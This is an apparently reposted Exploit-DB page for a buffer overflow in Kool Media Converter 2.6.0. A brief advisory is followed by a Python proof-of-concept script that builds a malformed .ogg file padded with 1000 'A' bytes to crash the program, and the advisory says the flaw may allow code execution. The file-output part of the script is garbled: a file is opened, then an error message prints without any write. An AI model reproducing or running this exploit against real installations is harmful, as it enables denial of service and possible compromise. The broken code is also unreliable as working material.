Kool Media Converter 2.6.0 – ‘.ogg’ File Buffer Overflow

  • 作者: swami
    日期: 2011-11-11
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/36300/
  • source: https://www.securityfocus.com/bid/50651/info
    Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
    Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
    Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected. 
    #!/usr/bin/env python
    # Exploit Title: Kool Media Converter v2.6.0 DOS
    # Date: 10/10/2011
    # Author: swami
    # E-Mail: flavio[dot]baldassi[at]gmail[dot]com
    # Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe
    # Version: 2.6.0
    # Tested on: Windows XP SP3 ENG
    #--- From Vendor Website
    # Kool Media Converter is a sound tool addressed to casual listeners and fervent 
    # audiophiles likewise. It deals with compatibility problems between your audio files 
    # and the media player you are using to help you enjoy all the songs you love anyway you like.
    #--- Description
    # Kool Media Converter fails to handle a malformed .ogg file
    ogg = b'\x4F\x67\x67\x53'		# Capture Pattern OggS in ascii
    ogg += b'\x00'				# Version currently 0
    ogg += b'\x02'		 		# Header Type of page that follows
    ogg += b'\x00' * 8			# Granule Position
    ogg += b'\xCE\xc6\x41\x49'		# Bitstream Serial Number
    ogg += b'\x00' * 4 			# Page Sequence Number
    ogg += b'\x70\x79\xf3\x3d'	 	# Checksum
    ogg += b'\x01'		 		# Page Segment max 255
    ogg += b'\x1e\x01\x76\x6f'		# Segment Table
    ogg += b'\x41' * 1000
    	f = open('koolPoC.ogg','wb')
    	print('\nError while creating ogg file\n')